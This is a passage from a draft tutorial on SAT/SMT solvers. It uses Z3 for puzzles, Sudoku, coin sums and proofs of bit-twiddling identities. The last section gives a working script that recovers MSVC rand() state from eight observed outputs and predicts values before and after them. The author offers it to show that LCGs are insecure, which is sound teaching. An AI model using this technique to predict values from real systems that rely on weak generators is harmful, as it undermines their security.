    11.4.2 Finding "still lives"
    11.4.3 The source code
12 Acronyms used

1 This is a draft!
This is a very early draft, but it may still be interesting to someone. The latest version is always available at http://yurichev.com/writings/SAT_SMT_draft-EN.pdf. The Russian version is at http://yurichev.com/writings/SAT_SMT_draft-RU.pdf. Current text version: May 8, 2017.
For news about updates, you may subscribe to my twitter5, facebook6, or github repo7.

2 Thanks

Leonardo de Moura and Nikolaj Bjorner, for help.

3 Introduction

SAT/SMT solvers can be viewed as solvers of huge systems of equations. The difference is that SMT solvers take systems in arbitrary format, while SAT solvers are limited to boolean equations in CNF8 form. A lot of real world problems can be represented as problems of solving a system of equations.

4 Is it a hype? Yet another fad?

Some people say this is just another hype. No: SAT is old enough and fundamental to CS9. The reason for the increased interest in it is that computers have become faster over the last couple of decades, so there are attempts to solve old problems using SAT/SMT which were inaccessible in the past.

5 https://twitter.com/yurichev
6 https://www.facebook.com/dennis.yurichev.5
7 https://github.com/dennis714/SAT_SMT_article
8 Conjunctive normal form
9 Computer science

5 SMT-solvers

5.1 School-level system of equations

I've got this school-level system of equations copypasted from Wikipedia10:

3x + 2y - z = 1
2x - 2y + 4z = -2
-x + (1/2)y - z = 0

Will it be possible to solve it using Z3? Here it is:

#!/usr/bin/python
from z3 import *

x = Real('x')
y = Real('y')
z = Real('z')

s = Solver()
s.add(3*x + 2*y - z == 1)
s.add(2*x - 2*y + 4*z == -2)
s.add(-x + 0.5*y - z == 0)

print s.check()
print s.model()

We see this after a run:

sat
[z = -2, y = -2, x = 1]

If we change any equation in some way so that it has no solution, s.check() will return "unsat". I've used the "Real" sort (some kind of data type in SMT-solvers) because the last equation contains the coefficient 1/2, which is, of course, a real number. For an integer system of equations, the "Int" sort would work fine. The Python (and other high-level PLs11 like C#) interface is highly popular, because it's practical, but in fact, there is a standard language for SMT-solvers called SMT-LIB12.
Our example rewritten to it looks like this:

(declare-const x Real)
(declare-const y Real)
(declare-const z Real)
(assert (= (- (+ (* 3 x) (* 2 y)) z) 1))
(assert (= (+ (- (* 2 x) (* 2 y)) (* 4 z)) -2))
(assert (= (- (+ (- 0 x) (* 0.5 y)) z) 0))
(check-sat)
(get-model)

This language is very close to LISP, but is somewhat hard to read for untrained eyes. Now we run it:

% z3 -smt2 example.smt
sat
(model
  (define-fun z () Real (- 2.0))
  (define-fun y () Real (- 2.0))
  (define-fun x () Real 1.0)
)

So when you look back at my Python code, you may feel that these 3 expressions could be executed. This is not true: the Z3Py API offers overloaded operators, so expressions are constructed and passed into the guts of Z3 without any execution13. I would call it an "embedded DSL14".

10 https://en.wikipedia.org/wiki/System_of_linear_equations
11 Programming Language
12 http://smtlib.cs.uiowa.edu/papers/smt-lib-reference-v2.5-r2015-06-28.pdf
13 https://github.com/Z3Prover/z3/blob/6e852762baf568af2aad1e35019fdf41189e4e12/src/api/python/z3.py
14 Domain-specific language

The same goes for the Z3 C++ API: you may find "operator+" declarations there and many more15. Z3 APIs16 for Java, ML and .NET also exist17.
Z3Py tutorial: https://github.com/ericpony/z3py-tutorial.
Z3 tutorial which uses the SMT-LIB language: http://rise4fun.com/Z3/tutorial/guide.

5.2 Another school-level system of equations

I've found this one somewhere on Facebook:

Figure 1: System of equations

It's that easy to solve it in Z3:

#!/usr/bin/python
from z3 import *

circle, square, triangle = Ints('circle square triangle')
s = Solver()
s.add(circle+circle==10)
s.add(circle*square+square==12)
s.add(circle*square-triangle*circle==circle)
print s.check()
print s.model()

sat
[triangle = 1, square = 2, circle = 5]

5.3 Connection between SAT and SMT solvers

Early SMT-solvers were frontends to SAT solvers, i.e., they translated input SMT expressions into CNF and fed a SAT-solver with it. The translation process is sometimes called "bit blasting". Some SMT-solvers still work that way: STP uses MiniSAT or CryptoMiniSAT as its backend SAT-solver.
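To get a feel for what bit blasting produces, here is a hand-made illustration (mine, not the encoding STP or any real solver emits): the one-bit constraint c == (a AND b) translated into three CNF clauses, checked by brute force in plain Python.

```python
from itertools import product

# A hand-made Tseitin-style CNF encoding of the one-bit constraint
# c == (a AND b). Each clause is a list of literals: a positive number
# means the variable itself, a negative number means its negation.
# Variables: 1 = a, 2 = b, 3 = c.
clauses = [[-1, -2, 3],  # (a AND b) implies c
           [1, -3],      # c implies a
           [2, -3]]      # c implies b

def satisfies(assignment, clauses):
    # assignment maps a variable number to a boolean;
    # a CNF holds when every clause has at least one true literal
    return all(any(assignment[abs(lit)] == (lit > 0) for lit in clause)
               for clause in clauses)

# brute force over all 8 assignments: the CNF holds exactly when c == (a AND b)
for a, b, c in product([False, True], repeat=3):
    assert satisfies({1: a, 2: b, 3: c}, clauses) == (c == (a and b))

print("CNF encoding of c == (a AND b) verified for all 8 assignments")
```

A solver translating a whole 32-bit constraint would emit clauses like these for every bit of every gate, which is why the resulting CNF instances get large.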
Some other SMT-solvers are more advanced (like Z3), so they use something even more complex.

5.4 Zebra puzzle (AKA Einstein puzzle)

The Zebra puzzle is a popular puzzle, defined as follows:

15 https://github.com/Z3Prover/z3/blob/6e852762baf568af2aad1e35019fdf41189e4e12/src/api/c%2B%2B/z3%2B%2B.h
16 Application programming interface
17 https://github.com/Z3Prover/z3/tree/6e852762baf568af2aad1e35019fdf41189e4e12/src/api

1. There are five houses.
2. The Englishman lives in the red house.
3. The Spaniard owns the dog.
4. Coffee is drunk in the green house.
5. The Ukrainian drinks tea.
6. The green house is immediately to the right of the ivory house.
7. The Old Gold smoker owns snails.
8. Kools are smoked in the yellow house.
9. Milk is drunk in the middle house.
10. The Norwegian lives in the first house.
11. The man who smokes Chesterfields lives in the house next to the man with the fox.
12. Kools are smoked in the house next to the house where the horse is kept.
13. The Lucky Strike smoker drinks orange juice.
14. The Japanese smokes Parliaments.
15. The Norwegian lives next to the blue house.

Now, who drinks water? Who owns the zebra?

In the interest of clarity, it must be added that each of the five houses is painted a different color, and their inhabitants are of different national extractions, own different pets, drink different beverages and smoke different brands of American cigarets [sic]. One other thing: in statement 6, right means your right.

(https://en.wikipedia.org/wiki/Zebra_Puzzle)

It's a very good example of a CSP18. We will encode each entity as an integer variable representing the number of a house. Then, to define that the Englishman lives in the red house, we will add this constraint: Englishman == Red, meaning that the number of the house where the Englishman resides and the number of the house which is painted red are the same. To define that the Norwegian lives next to the blue house, we don't really know whether he is on the left side of the blue house or on the right side, but we know that the house numbers differ by just 1. So we will define this constraint: Norwegian==Blue-1 OR Norwegian==Blue+1. We will also need to limit all house numbers, so they will be in the range of 1..5.
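The Norwegian==Blue-1 OR Norwegian==Blue+1 encoding of "next to" can be sanity-checked by plain enumeration; this throwaway Python sketch (mine, separate from the solver code in this section) lists every pair of house numbers the constraint admits:

```python
from itertools import product

# Enumerate every (Norwegian, Blue) pair of house numbers in 1..5 and keep
# those satisfying Norwegian==Blue-1 or Norwegian==Blue+1 ("next to").
next_to = [(n, b) for n, b in product(range(1, 6), repeat=2)
           if n == b - 1 or n == b + 1]

# the surviving pairs are exactly those whose house numbers differ by 1
assert all(abs(n - b) == 1 for n, b in next_to)
assert len(next_to) == 8

print(next_to)
```

The same Or() pattern appears twice more in the puzzle, for statements 11 and 12.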
We will also use Distinct to state that all entities of the same type have different house numbers.

18 Constraint satisfaction problem

#!/usr/bin/env python
from z3 import *

Yellow, Blue, Red, Ivory, Green=Ints('Yellow Blue Red Ivory Green')
Norwegian, Ukrainian, Englishman, Spaniard, Japanese=Ints('Norwegian Ukrainian Englishman Spaniard Japanese')
Water, Tea, Milk, OrangeJuice, Coffee=Ints('Water Tea Milk OrangeJuice Coffee')
Kools, Chesterfield, OldGold, LuckyStrike, Parliament=Ints('Kools Chesterfield OldGold LuckyStrike Parliament')
Fox, Horse, Snails, Dog, Zebra=Ints('Fox Horse Snails Dog Zebra')

s = Solver()

# colors are distinct for all 5 houses:
s.add(Distinct(Yellow, Blue, Red, Ivory, Green))
# all nationalities are living in different houses:
s.add(Distinct(Norwegian, Ukrainian, Englishman, Spaniard, Japanese))
# so are beverages:
s.add(Distinct(Water, Tea, Milk, OrangeJuice, Coffee))
# so are cigarettes:
s.add(Distinct(Kools, Chesterfield, OldGold, LuckyStrike, Parliament))
# so are pets:
s.add(Distinct(Fox, Horse, Snails, Dog, Zebra))

# limits.
# adding two constraints at once (separated by comma) is the same
# as adding one And() constraint with two subconstraints
s.add(Yellow>=1, Yellow<=5)
s.add(Blue>=1, Blue<=5)
s.add(Red>=1, Red<=5)
s.add(Ivory>=1, Ivory<=5)
s.add(Green>=1, Green<=5)
s.add(Norwegian>=1, Norwegian<=5)
s.add(Ukrainian>=1, Ukrainian<=5)
s.add(Englishman>=1, Englishman<=5)
s.add(Spaniard>=1, Spaniard<=5)
s.add(Japanese>=1, Japanese<=5)
s.add(Water>=1, Water<=5)
s.add(Tea>=1, Tea<=5)
s.add(Milk>=1, Milk<=5)
s.add(OrangeJuice>=1, OrangeJuice<=5)
s.add(Coffee>=1, Coffee<=5)
s.add(Kools>=1, Kools<=5)
s.add(Chesterfield>=1, Chesterfield<=5)
s.add(OldGold>=1, OldGold<=5)
s.add(LuckyStrike>=1, LuckyStrike<=5)
s.add(Parliament>=1, Parliament<=5)
s.add(Fox>=1, Fox<=5)
s.add(Horse>=1, Horse<=5)
s.add(Snails>=1, Snails<=5)
s.add(Dog>=1, Dog<=5)
s.add(Zebra>=1, Zebra<=5)

# main constraints of the puzzle:

# 2. The Englishman lives in the red house.
s.add(Englishman==Red)
# 3. The Spaniard owns the dog.
s.add(Spaniard==Dog)
# 4. Coffee is drunk in the green house.
s.add(Coffee==Green)
# 5. The Ukrainian drinks tea.
s.add(Ukrainian==Tea)
# 6. The green house is immediately to the right of the ivory house.
s.add(Green==Ivory+1)
# 7. The Old Gold smoker owns snails.
s.add(OldGold==Snails)
# 8. Kools are smoked in the yellow house.
s.add(Kools==Yellow)
# 9. Milk is drunk in the middle house.
s.add(Milk==3) # i.e., 3rd house
# 10. The Norwegian lives in the first house.
s.add(Norwegian==1)
# 11. The man who smokes Chesterfields lives in the house next to the man with the fox.
s.add(Or(Chesterfield==Fox+1, Chesterfield==Fox-1)) # left or right
# 12. Kools are smoked in the house next to the house where the horse is kept.
s.add(Or(Kools==Horse+1, Kools==Horse-1)) # left or right
# 13. The Lucky Strike smoker drinks orange juice.
s.add(LuckyStrike==OrangeJuice)
# 14. The Japanese smokes Parliaments.
s.add(Japanese==Parliament)
# 15. The Norwegian lives next to the blue house.
s.add(Or(Norwegian==Blue+1, Norwegian==Blue-1)) # left or right

r=s.check()
print r
if r==unsat:
    exit(0)
m=s.model()
print(m)

When we run it, we get the correct result:

sat
[Snails = 3, Blue = 2, Ivory = 4, OrangeJuice = 4, Parliament = 5, Yellow = 1,
 Fox = 1, Zebra = 5, Horse = 2, Dog = 4, Tea = 2, Water = 1, Chesterfield = 2,
 Red = 3, Japanese = 5, LuckyStrike = 4, Norwegian = 1, Milk = 3, Kools = 1,
 OldGold = 3, Ukrainian = 2, Coffee = 5, Green = 5, Spaniard = 4, Englishman = 3]

5.5 Sudoku puzzle

A Sudoku puzzle is a 9*9 grid with some cells filled with values and some left empty:

. . 5 | 3 . . | . . .
8 . . | . . . | . 2 .
. 7 . | . 1 . | 5 . .
------+-------+------
4 . . | . . 5 | 3 . .
. 1 . | . 7 . | . . 6
. . 3 | 2 . . | . 8 .
------+-------+------
. 6 . | 5 . . | . . 9
. . 4 | . . . | . 3 .
. . . | . . 9 | 7 . .

Unsolved Sudoku

The numbers in each row must be unique, i.e., each row must contain all 9 numbers in the range of 1..9 without repetition. The same goes for each column and also for each 3*3 square. This puzzle is a good candidate for trying an SMT solver on, because it's essentially an unsolved system of equations.

5.5.1 The first idea

The only thing we must decide is how to determine, in a single expression, whether 9 input variables hold all 9 unique numbers.
They are not ordered or sorted, after all. From school-level arithmetic, we can devise this idea:

    10^i1 + 10^i2 + ... + 10^i9 = 1111111110    (1)

Take each input variable, compute 10^i, and sum them all. If all input values are unique, each will settle at its own place. Even more than that: there will be no holes, i.e., no skipped values. So, in the case of Sudoku, the final result will be the number 1111111110, indicating that all 9 input values are unique and lie in the range of 1..9. Exponentiation is a heavy operation; can we use binary operations instead? Yes, just replace 10 with 2:

    2^i1 + 2^i2 + ... + 2^i9 = 1111111110 (base 2)    (2)

The effect is just the same, but the final value is in base 2 instead of 10. Now a working example:

import sys
from z3 import *

"""
coordinates:
------------------------------
00 01 02 | 03 04 05 | 06 07 08
10 11 12 | 13 14 15 | 16 17 18
20 21 22 | 23 24 25 | 26 27 28
------------------------------
30 31 32 | 33 34 35 | 36 37 38
40 41 42 | 43 44 45 | 46 47 48
50 51 52 | 53 54 55 | 56 57 58
------------------------------
60 61 62 | 63 64 65 | 66 67 68
70 71 72 | 73 74 75 | 76 77 78
80 81 82 | 83 84 85 | 86 87 88
------------------------------
"""

s=Solver()

# using a Python list comprehension, construct an array of arrays of BitVec instances:
cells=[[BitVec('cell%d%d' % (r, c), 16) for c in range(9)] for r in range(9)]

# http://www.norvig.com/sudoku.html
# http://www.mirror.co.uk/news/weird-news/worlds-hardest-sudoku-can-you-242294
puzzle="..53.....8......2..7..1.5..4....53...1..7...6..32...8..6.5....9..4....3......97.."
# process the text line:
current_column=0
current_row=0
for i in puzzle:
    if i!='.':
        s.add(cells[current_row][current_column]==BitVecVal(int(i),16))
    current_column=current_column+1
    if current_column==9:
        current_column=0
        current_row=current_row+1

one=BitVecVal(1,16)
mask=BitVecVal(0b1111111110,16)

# for all 9 rows
for r in range(9):
    s.add((one<<cells[r][0]) + (one<<cells[r][1]) + (one<<cells[r][2]) +
          (one<<cells[r][3]) + (one<<cells[r][4]) + (one<<cells[r][5]) +
          (one<<cells[r][6]) + (one<<cells[r][7]) + (one<<cells[r][8]) == mask)

The constraints for the 9 columns and the 9 3*3 squares are built in the same way. This version works, but slowly.

5.5.2 Using Distinct()

Z3 also has a built-in Distinct() constraint, which states that all its arguments must be distinct. With it, the range of each cell must be limited explicitly:

# all cells must hold values in the 1..9 range:
for r in range(9):
    for c in range(9):
        s.add(cells[r][c]>=1)
        s.add(cells[r][c]<=9)

# for all 9 rows
for r in range(9):
    s.add(Distinct(cells[r][0], cells[r][1], cells[r][2], cells[r][3], cells[r][4],
                   cells[r][5], cells[r][6], cells[r][7], cells[r][8]))

# for all 9 columns
for c in range(9):
    s.add(Distinct(cells[0][c], cells[1][c], cells[2][c], cells[3][c], cells[4][c],
                   cells[5][c], cells[6][c], cells[7][c], cells[8][c]))

# enumerate all 9 squares
for r in range(0, 9, 3):
    for c in range(0, 9, 3):
        # add constraints for each 3*3 square:
        s.add(Distinct(cells[r+0][c+0], cells[r+0][c+1], cells[r+0][c+2],
                       cells[r+1][c+0], cells[r+1][c+1], cells[r+1][c+2],
                       cells[r+2][c+0], cells[r+2][c+1], cells[r+2][c+2]))

s.check()
m=s.model()
for r in range(9):
    for c in range(9):
        sys.stdout.write(str(m[cells[r][c]])+" ")
    print("")

(https://github.com/dennis714/SAT_SMT_article/blob/master/SMT/sudoku2.py)

% time python sudoku2.py
1 4 5 3 2 7 6 9 8
8 3 9 6 5 4 1 2 7
6 7 2 9 1 8 5 4 3
4 9 6 1 8 5 3 7 2
2 1 8 4 7 3 9 5 6
7 5 3 2 9 6 4 8 1
3 6 7 5 4 2 8 1 9
9 8 4 7 6 1 2 3 5
5 2 1 8 3 9 7 6 4

real 0m0.382s
user 0m0.346s
sys 0m0.036s

That's much faster.

5.5.3 Conclusion

SMT-solvers are so helpful that our Sudoku solver contains nothing else: we have just defined the relationships between the variables (cells).

5.5.4 Homework

As it seems, a true Sudoku puzzle is one that has only one solution. The piece of code included here shows only the first one found. Using the method described earlier (5.6, also called "model counting"), try to find more solutions, or prove that the solution you have just found is the only one possible.
5.5.5 Further reading

http://www.norvig.com/sudoku.html

5.5.6 Sudoku as a SAT problem

It is also possible to represent a Sudoku puzzle as a huge CNF equation and use a SAT-solver to find the solution, but it is just trickier. Some articles about it: Building a Sudoku Solver with SAT [20], Tjark Weber; A SAT-based Sudoku Solver [21], Ines Lynce, Joel Ouaknine; Sudoku as a SAT Problem [22], Gihwon Kwon, Himanshu Jain; Optimized CNF Encoding for Sudoku Puzzles [23].

An SMT-solver may also use a SAT-solver at its core, so it does all the mundane translation work. As a "compiler", it may not do this in the most efficient way, though.

5.6 Solving Project Euler problem 31: "Coin sums"

(This text was first published in my blog [24] on 10-May-2013.)

    In England the currency is made up of pound, £, and pence, p, and there are eight coins
    in general circulation: 1p, 2p, 5p, 10p, 20p, 50p, £1 (100p) and £2 (200p). It is
    possible to make £2 in the following way: 1×£1 + 1×50p + 2×20p + 1×5p + 1×2p + 3×1p.
    How many different ways can £2 be made using any number of coins?
    (Project Euler problem 31, "Coin sums")

Using Z3 to solve this is overkill, and also slow, but nevertheless it works, showing all possible solutions as well. The piece of code for blocking an already found solution and searching for the next one, and thus counting all solutions, was taken from a Stack Overflow answer [25]. This is also called "model counting". Constraints like "a>=0" must be present, because otherwise the Z3 solver would find solutions with negative numbers.
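Before running the solver, the expected count can be obtained independently with textbook dynamic programming (my own sketch, not part of the original program); this gives a number to compare the model-counting loop against:

```python
# count the ways to make 200 pence from the eight coins by dynamic
# programming: ways[n] = number of ways to make n pence
coins = [1, 2, 5, 10, 20, 50, 100, 200]
ways = [1] + [0] * 200          # one way to make 0p: take no coins
for coin in coins:
    for n in range(coin, 201):
        ways[n] += ways[n - coin]
print(ways[200])  # 73682
```

This runs instantly, which underlines the "overkill" remark: the solver is used here not for speed, but to demonstrate model counting.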
#!/usr/bin/python
from z3 import *

a,b,c,d,e,f,g,h = Ints('a b c d e f g h')

s = Solver()
s.add(1*a + 2*b + 5*c + 10*d + 20*e + 50*f + 100*g + 200*h == 200,
      a>=0, b>=0, c>=0, d>=0, e>=0, f>=0, g>=0, h>=0)

result=[]

while True:
    if s.check() == sat:
        m = s.model()
        print(m)
        result.append(m)
        # create a new constraint that blocks the current model
        block = []
        for d in m:
            # d is a declaration
            if d.arity() > 0:
                raise Z3Exception("uninterpreted functions are not supported")
            # create a constant from the declaration
            c=d()
            if is_array(c) or c.sort().kind() == Z3_UNINTERPRETED_SORT:
                raise Z3Exception("arrays and uninterpreted sorts are not supported")
            block.append(c != m[d])
        s.add(Or(block))
    else:
        print(len(result))
        break

[20] http://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-005-elements-of-software-construction-fall-2011/assignments/MIT6_005F11_ps4.pdf
[21] https://www.lri.fr/~conchon/mpri/weber.pdf
[22] http://sat.inesc-id.pt/~ines/publications/aimath06.pdf
[23] http://www.cs.cmu.edu/~hjain/papers/sudoku-as-SAT.pdf
[24] http://dennisyurichev.blogspot.de/2013/05/in-england-currency-is-made-up-of-pound.html
[25] http://stackoverflow.com/questions/11867611/z3py-checking-all-solutions-for-equation ; another question: http://stackoverflow.com/questions/13395391/z3-finding-all-satisfying-models

It works very slowly, and this is what it produces:

[h = 0, g = 0, f = 0, e = 0, d = 0, c = 0, b = 0, a = 200]
[f = 1, b = 5, a = 0, d = 1, g = 1, h = 0, c = 2, e = 1]
[f = 0, b = 1, a = 153, d = 0, g = 0, h = 0, c = 1, e = 2]
...
[f = 0, b = 31, a = 33, d = 2, g = 0, h = 0, c = 17, e = 0]
[f = 0, b = 30, a = 35, d = 2, g = 0, h = 0, c = 17, e = 0]
[f = 0, b = 5, a = 50, d = 2, g = 0, h = 0, c = 24, e = 0]

73682 results in total.

5.7 Using the Z3 theorem prover to prove equivalence of some weird alternative to the XOR operation

(This text was first published in my blog in April 2015: http://blog.yurichev.com/node/86.)
There is "A Hacker's Assistant" program [26] (Aha!) written by Henry Warren, who is also the author of the great "Hacker's Delight" book. The Aha! program is essentially a superoptimizer [27], which blindly brute-forces a list of generic RISC CPU instructions to find the shortest possible (and jumpless, or branch-free) CPU code sequence for a desired operation. For example, Aha! can easily find a jumpless version of the abs() function.

Compiler developers use superoptimization to find the shortest possible (and/or jumpless) code, but I tried to do the opposite: to find the longest code for some primitive operation. I used Aha! to find an equivalent of the basic XOR operation without using the actual XOR instruction, and the most bizarre example Aha! gave is:

Found a 4-operation program:
   add   r1,ry,rx
   and   r2,ry,rx
   mul   r3,r2,-2
   add   r4,r3,r1
   Expr: (((y & x)*-2) + (y + x))

It is hard to say why/where we could use it; maybe for obfuscation, I'm not sure. I would call this suboptimization (as opposed to superoptimization). Or maybe superdeoptimization.

But my other question was: is it possible to prove that this formula is correct at all? Aha! checks some input/output values against the XOR operation, but, of course, not all possible values. It is 32-bit code, so it may take a very long time to try all possible 32-bit inputs. We can try the Z3 theorem prover for the job. It is called a prover, after all. So I wrote this:

#!/usr/bin/python
from z3 import *

x = BitVec('x', 32)
y = BitVec('y', 32)
output = BitVec('output', 32)

s = Solver()
s.add(x^y==output)
s.add(((y & x)*0xFFFFFFFE) + (y + x)!=output)
print(s.check())

[26] http://www.hackersdelight.org/
[27] http://en.wikipedia.org/wiki/Superoptimization

In plain English, this means: "is there any case for x and y where x XOR y does not equal ((y & x)*(-2)) + (y + x)?"

... and Z3 prints "unsat", meaning it cannot find any counterexample to the equation. So this Aha! result is proven to work just like the XOR operation.
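The proof can be complemented by a quick randomized sanity check in plain Python (my own sketch); this is essentially what Aha! itself does, only on a handful of values, which is exactly why a real proof is still needed:

```python
import random

def weird_xor(x, y, bits=32):
    # (((y & x) * -2) + (y + x)), truncated like a 32-bit register
    mask = (1 << bits) - 1
    return (((y & x) * -2) + (y + x)) & mask

random.seed(0)
for _ in range(100000):
    x = random.getrandbits(32)
    y = random.getrandbits(32)
    assert weird_xor(x, y) == x ^ y
print("100000 random tests passed")
```

A hundred thousand passing random tests is encouraging, but still covers a negligible fraction of the 2^64 input pairs; Z3 covers them all.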
Oh, I also tried to extend the formula to 64 bits:

#!/usr/bin/python
from z3 import *

x = BitVec('x', 64)
y = BitVec('y', 64)
output = BitVec('output', 64)

s = Solver()
s.add(x^y==output)
s.add(((y & x)*0xFFFFFFFE) + (y + x)!=output)
print(s.check())

Nope, now it says "sat", meaning Z3 found at least one counterexample. Oops, that is because I forgot to extend the -2 constant to a 64-bit value:

#!/usr/bin/python
from z3 import *

x = BitVec('x', 64)
y = BitVec('y', 64)
output = BitVec('output', 64)

s = Solver()
s.add(x^y==output)
s.add(((y & x)*0xFFFFFFFFFFFFFFFE) + (y + x)!=output)
print(s.check())

Now it says "unsat", so the formula given by Aha! works for 64-bit code as well.

5.7.1 In SMT-LIB form

Now we can rephrase our expression in a more suitable form: x + y - ((x & y)<<1). It also works well in Z3Py:

#!/usr/bin/python
from z3 import *

x = BitVec('x', 64)
y = BitVec('y', 64)
output = BitVec('output', 64)

s = Solver()
s.add(x^y==output)
s.add((x + y - ((x & y)<<1)) != output)
print(s.check())

Here is how to define it in the SMT-LIB way:

(declare-const x (_ BitVec 64))
(declare-const y (_ BitVec 64))
(assert
    (not (=
        (bvsub (bvadd x y) (bvshl (bvand x y) (_ bv1 64)))
        (bvxor x y)
    ))
)
(check-sat)

5.7.2 Using quantifiers

Z3 supports the existential quantifier exists, which is true if at least one set of variables satisfies the underlying condition:

(declare-const x (_ BitVec 64))
(declare-const y (_ BitVec 64))
(assert
    (exists ((x (_ BitVec 64)) (y (_ BitVec 64)))
        (not (=
            (bvsub (bvadd x y) (bvshl (bvand x y) (_ bv1 64)))
            (bvxor x y)
        ))
    )
)
(check-sat)

It returns "unsat", meaning Z3 could not find any counterexample to the equation, i.e., none exists. This quantifier is also known as ∃ in mathematical logic lingo.

Z3 also supports the universal quantifier forall, which is true if the equation is true for all possible values.
So we can rewrite our SMT-LIB example as:

(declare-const x (_ BitVec 64))
(declare-const y (_ BitVec 64))
(assert
    (forall ((x (_ BitVec 64)) (y (_ BitVec 64)))
        (=
            (bvsub (bvadd x y) (bvshl (bvand x y) (_ bv1 64)))
            (bvxor x y)
        )
    )
)
(check-sat)

It returns "sat", meaning the equation is correct for all possible 64-bit x and y values, as if they had all been checked. Mathematically speaking [28]:

    ∀x, y: x ⊕ y = x + y − ((x & y) ≪ 1)

[28] ∀ means the equation must be true for all possible values, which are chosen from the natural numbers (N).

5.7.3 How the expression works

First of all, binary addition can be viewed as binary XORing with carrying (11.2). Here is an example: let's add 2 (10b) and 2 (10b). XORing these two values gives 0, but a carry is generated during the addition of the two second bits. That carry bit is propagated further and settles at the place of the 3rd bit: 100b. 4 (100b) is hence the final result of the addition. If no carry bits are generated during addition, the addition is merely XORing. For example, let's add 1 (1b) and 2 (10b): 1 + 2 equals 3, but 1 ⊕ 2 is also 3.

If addition is XORing plus carry generation and application, we should somehow eliminate the effect of carrying. The first part of the expression (x + y) is the addition; the second part ((x & y) ≪ 1) is just the computation of every carry bit that was used during the addition. If we subtract the carry bits from the result of the addition, only the XOR effect is left.

It is hard to say how Z3 proves this: maybe it just simplifies the equation down to a single XOR using simple boolean algebra rewriting rules?

5.8 Dietz's formula

One of the impressive examples of Aha!'s work is the finding of Dietz's formula [29], which is code computing the average of two numbers without overflow (important if you want to find the average of numbers like 0xFFFFFF00 and so on, using 32-bit registers). Taking this as input:

[29] http://aggregate.org/MAGIC/#Average%20of%20Integers

int userfun(int x, int y) {
    // To find Dietz's formula for
    // the floor-average of two
    // unsigned integers.
    return ((unsigned long long)x + (unsigned long long)y) >> 1;
}

... Aha! gives this:

Found a 4-operation program:
   and   r1,ry,rx
   xor   r2,ry,rx
   shrs  r3,r2,1
   add   r4,r3,r1
   Expr: (((y ^ x) >>s 1) + (y & x))

And it works correctly [30]. But how do we prove it? We will place Dietz's formula on the left side of the equation and (x + y) >> 1 on the right side:

    ∀x, y ∈ 0..2^64−1: (x & y) + ((x ⊕ y) ≫ 1) = (x + y) ≫ 1

One important thing is that we cannot operate on 64-bit values on the right side, because the result would overflow. So we will zero-extend the inputs on the right side by 1 bit (in other words, we will just prepend 1 zero bit to each value). The result of Dietz's formula will also be extended by 1 bit. Hence, both sides of the equation will have a width of 65 bits:

(declare-const x (_ BitVec 64))
(declare-const y (_ BitVec 64))
(assert
    (forall ((x (_ BitVec 64)) (y (_ BitVec 64)))
        (=
            ((_ zero_extend 1)
                (bvadd (bvand x y) (bvlshr (bvxor x y) (_ bv1 64)))
            )
            (bvlshr (bvadd ((_ zero_extend 1) x) ((_ zero_extend 1) y)) (_ bv1 65))
        )
    )
)
(check-sat)

Z3 says "sat". 65 bits are enough, because the result of the addition of the two biggest 64-bit values has a width of 65 bits: 0xFF...FF + 0xFF...FF = 0x1FF...FE.

As in the previous example about the XOR equivalent, (not (= ...)) and exists can also be used here instead of forall.

[30] For those interested in how it works: its mechanics are closely related to the weird XOR alternative we have just seen. That is why I placed these two pieces of text one after another.

5.9 Cracking an LCG with Z3

(This text first appeared in my blog in June 2015: http://yurichev.com/blog/modulo/.)

There are well-known weaknesses in LCGs [31], but let's see if it would be possible to crack one straightforwardly, without any special knowledge. We will define all relations between the LCG states in terms of Z3. Here is a test program:
[31] http://en.wikipedia.org/wiki/Linear_congruential_generator#Advantages_and_disadvantages_of_LCGs , http://www.reteam.org/papers/e59.pdf , http://stackoverflow.com/questions/8569113/why-1103515245-is-used-in-rand/8574774#8574774

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main()
{
    int i;
    srand(time(NULL));
    for (i=0; i<10; i++)
        printf ("%d\n", rand()%100);
};

It prints 10 pseudorandom numbers in the 0..99 range:

37 29 74 95 98 40 23 58 61 17

Let's say we are observing only 8 of these numbers (from 29 to 61) and we need to predict the next one (17) and/or the previous one (37). The program is compiled using MSVC 2013 (I chose it because its LCG is simpler than the one in Glibc):

.text:0040112E rand            proc near
.text:0040112E                 call    __getptd
.text:00401133                 imul    ecx, [eax+0x14], 214013
.text:0040113A                 add     ecx, 2531011
.text:00401140                 mov     [eax+14h], ecx
.text:00401143                 shr     ecx, 16
.text:00401146                 and     ecx, 7FFFh
.text:0040114C                 mov     eax, ecx
.text:0040114E                 retn
.text:0040114E rand            endp

Let's define the LCG in Z3Py:

#!/usr/bin/python
from z3 import *

output_prev = BitVec('output_prev', 32)
state1 = BitVec('state1', 32)
state2 = BitVec('state2', 32)
state3 = BitVec('state3', 32)
state4 = BitVec('state4', 32)
state5 = BitVec('state5', 32)
state6 = BitVec('state6', 32)
state7 = BitVec('state7', 32)
state8 = BitVec('state8', 32)
state9 = BitVec('state9', 32)
state10 = BitVec('state10', 32)
output_next = BitVec('output_next', 32)

s = Solver()
s.add(state2 == state1*214013+2531011)
s.add(state3 == state2*214013+2531011)
s.add(state4 == state3*214013+2531011)
s.add(state5 == state4*214013+2531011)
s.add(state6 == state5*214013+2531011)
s.add(state7 == state6*214013+2531011)
s.add(state8 == state7*214013+2531011)
s.add(state9 == state8*214013+2531011)
s.add(state10 == state9*214013+2531011)
s.add(output_prev==URem((state1>>16)&0x7FFF,100))
s.add(URem((state2>>16)&0x7FFF,100)==29)
s.add(URem((state3>>16)&0x7FFF,100)==74)
s.add(URem((state4>>16)&0x7FFF,100)==95)
s.add(URem((state5>>16)&0x7FFF,100)==98)
s.add(URem((state6>>16)&0x7FFF,100)==40)
s.add(URem((state7>>16)&0x7FFF,100)==23)
s.add(URem((state8>>16)&0x7FFF,100)==58)
s.add(URem((state9>>16)&0x7FFF,100)==61)
s.add(output_next==URem((state10>>16)&0x7FFF,100))

print(s.check())
print(s.model())

URem stands for unsigned remainder. The solver works for some time and gives us the correct result!

sat
[state3 = 2276903645, state4 = 1467740716, state5 = 3163191359,
 state7 = 4108542129, state8 = 2839445680, state2 = 998088354,
 state6 = 4214551046, state1 = 1791599627, state9 = 548002995,
 output_next = 17, output_prev = 37, state10 = 1390515370]

I added 10 states to be sure the result would be correct; it might not be with a smaller set of information.

That is the reason why an LCG is not suitable for any security-related task. This is why cryptographically secure pseudorandom number generators exist: they are designed to be protected against such simple attacks. Well, at least as long as the NSA [32] doesn't get involved [33].

